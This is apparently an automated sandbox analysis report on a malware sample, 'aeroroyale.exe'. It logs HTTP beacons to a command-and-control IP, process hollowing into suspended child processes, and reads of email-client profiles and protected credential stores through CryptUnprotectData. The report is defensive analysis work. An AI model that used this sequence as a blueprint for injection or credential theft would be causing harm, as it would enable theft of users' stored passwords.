| Inet | Open Connection | protocol = HTTP, server_name = 74.141.205.116, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 74.141.205.116 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| File | Delete | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp |
|
1 |
Thread 0xd30
49
30
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-08-01 10:20:18 (UTC) |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x77760000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x777b418d |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsFree, address_out = 0x777b1f61 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x777b1e16 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x777b76e6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x777b3879 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateEventExW, address_out = 0x777624d8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x77792111 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x777a2510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x7779b009 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x778689be |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7785c02a |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7785c0d2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x77793f78 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77868bfb |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7785b567 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77885998 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77852251 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x778528f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x77792004 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x777e9aa9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x777ef3cf |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CompareStringEx, address_out = 0x777bebc6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetDateFormatEx, address_out = 0x777ff29f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x777953a5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetTimeFormatEx, address_out = 0x777ff21a |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x777ef70b |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsValidLocaleName, address_out = 0x777ef71b |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x777ef72b |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetTickCount64, address_out = 0x7779eb4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = Global\Nx3FADD397 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x75c90000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x75a90000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x760f0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77660000 |
|
1 | |
| Module | Load | module_name = ws2_32.dll, base_address = 0x77a30000 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = 74.141.205.116, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /whoami.php, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://74.141.205.116:443/whoami.php |
|
1 | |
| Inet | Read Response | size = 64, size_out = 13 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_UDP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Bind | protocol = IPPROTO_UDP, local_address = 192.168.0.220, local_port = 63296, hint = OS assigned a local port from the dynamic client port range |
|
1 | |
| DNS | Resolve Name | host = 239.255.255.250, address_out = 239.255.255.250, service = 1900 |
|
1 | |
| Socket | Send | remote_address = 239.255.255.250, remote_port = 1900, flags = NO_FLAG_SET, size = 137, size_out = 137 |
|
1 | |
| DNS | Resolve Name | host = 239.255.255.250, address_out = 239.255.255.250, service = 1900 |
|
1 | |
| Socket | Send | remote_address = 239.255.255.250, remote_port = 1900, flags = NO_FLAG_SET, size = 132, size_out = 132 |
|
1 | |
| DNS | Resolve Name | host = 239.255.255.250, address_out = 239.255.255.250, service = 1900 |
|
1 | |
| Socket | Send | remote_address = 239.255.255.250, remote_port = 1900, flags = NO_FLAG_SET, size = 133, size_out = 133 |
|
1 | |
| DNS | Resolve Name | host = 239.255.255.250, address_out = 239.255.255.250, service = 1900 |
|
1 | |
| Socket | Send | remote_address = 239.255.255.250, remote_port = 1900, flags = NO_FLAG_SET, size = 101, size_out = 101 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 74.141.205.116, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 74.141.205.116 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Mutex | Release | mutex_name = Global\Nx3FADD397 |
|
1 |
Thread 0xd34
22
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = advapi32.dll, base_address = 0x75c90000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x75a90000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x760f0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x75040000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77660000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x74370000 |
|
1 | |
| File | Create Temp File | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp, path = C:\Users\BGC6U8~1\AppData\Local\Temp\ |
|
1 | |
| File | Delete | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe, size = 260 |
|
1 | |
| Process | Create | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" "C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp", os_pid = 0xd48, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE |
|
1 | |
| Memory | Get Info | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" "C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp", address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 |
|
1 | |
| Memory | Protect | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" "C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp", address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 102400 |
|
1 | |
| Thread | Get Context | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, os_tid = 0xd34 |
|
1 | |
| Memory | Write | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" "C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp", address = 0x400000, size = 102400 |
|
1 | |
| Memory | Write | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" "C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp", address = 0x7ffdc008, size = 4 |
|
1 | |
| Thread | Set Context | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, os_tid = 0xd34 |
|
1 | |
| Thread | Resume | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, os_tid = 0xd34 |
|
1 | |
| Process | Terminate | exit_code = 0 |
|
1 | |
| File | Create | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp, type = size |
|
1 | |
| File | Delete | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp |
|
1 |
Thread 0xd38
24
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = advapi32.dll, base_address = 0x75c90000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x75a90000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x760f0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x75040000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77660000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x74370000 |
|
1 | |
| File | Create Temp File | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp, path = C:\Users\BGC6U8~1\AppData\Local\Temp\ |
|
1 | |
| File | Delete | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe, size = 260 |
|
1 | |
| Process | Create | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp", os_pid = 0xd50, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE |
|
1 | |
| Memory | Get Info | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp", address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 |
|
1 | |
| Memory | Protect | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp", address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 372736 |
|
1 | |
| Module | Unmap | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp" |
|
1 | |
| Memory | Allocate | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp", address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 372736 |
|
1 | |
| Thread | Get Context | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, os_tid = 0xd38 |
|
1 | |
| Memory | Write | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp", address = 0x400000, size = 372736 |
|
1 | |
| Memory | Write | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp", address = 0x7ffda008, size = 4 |
|
1 | |
| Thread | Set Context | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, os_tid = 0xd38 |
|
1 | |
| Thread | Resume | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, os_tid = 0xd38 |
|
1 | |
| Process | Terminate | exit_code = 0 |
|
1 | |
| File | Create | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp, type = size |
|
1 | |
| File | Delete | filename = C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp |
|
1 |
Thread 0xd3c
9
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = advapi32.dll, base_address = 0x75c90000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x75a90000 |
|
1 | |
| Module | Load | module_name = mpr.dll, base_address = 0x72750000 |
|
1 | |
| Module | Load | module_name = netapi32.dll, base_address = 0x74270000 |
|
1 | |
| Module | Load | module_name = SAMCLI.DLL, base_address = 0x74240000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x760f0000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x74370000 |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 |
Process #9: aeroroyale.exe
204
0
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:03:27, Reason: Child Process |
| Unmonitor | End Time: 00:03:37, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd40 |
| Parent PID | 0xc08 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D44
0x
DA0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x00140fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00150fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x0025ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00260000 | 0x002c6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| 727.exe | 0x00400000 | 0x00426fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x004f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x00600fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x0120ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001210000 | 0x01210000 | 0x0130ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01310000 | 0x015defff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000015e0000 | 0x015e0000 | 0x016dffff | Private Memory | rw |
|
|
|
- |
| pstorec.dll | 0x66b10000 | 0x66b1cfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x66b50000 | 0x66bd3fff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x73d80000 | 0x73d93fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x758c0000 | 0x758dafff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75a00000 | 0x75a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75a90000 | 0x75bacfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75c90000 | 0x75d2ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75fd0000 | 0x75fe8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x760f0000 | 0x76d39fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x772e0000 | 0x7735afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x773f0000 | 0x77490fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x774a0000 | 0x774f6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77500000 | 0x7765bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #7: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 0xd2c | address = 0x400000, size = 114688 |
|
1 | |
| Modify Memory | #7: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 0xd2c | address = 0x7ffdf008, size = 4 |
|
1 | |
| Modify Control Flow | #7: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 0xd2c | os_tid = 0xd44, address = 0x0 |
|
1 |
Threads
Thread 0xd44
204
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\users\bgc6u8~1\appdata\local\temp\727.exe, base_address = 0x400000 |
|
2 | |
| Module | Load | module_name = comctl32.dll, base_address = 0x66b50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitCommonControlsEx, address_out = 0x66b56be6 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x760f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shell32.dll, function = SHGetSpecialFolderPathA, address_out = 0x7633fb26 |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale_lng.ini, type = file_attributes |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Profiles, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Thunderbird\Profiles, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird |
|
1 | |
| File | Get Info | filename = C:\Program Files\Mozilla Thunderbird, type = file_attributes |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe, size = 260 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = ShowGridLines, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = SaveFilterIndex, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = AddExportHeaderLine, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = MarkOddEvenRows, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = WinPos |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = Columns |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg, section_name = General, key_name = Sort, default_value = 0 |
|
1 | |
| Module | Load | module_name = pstorec.dll, base_address = 0x66b10000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\pstorec.dll, function = PStoreCreateInstance, address_out = 0x66b1526c |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x75a90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\crypt32.dll, function = CryptUnprotectData, address_out = 0x75ac5a7f |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
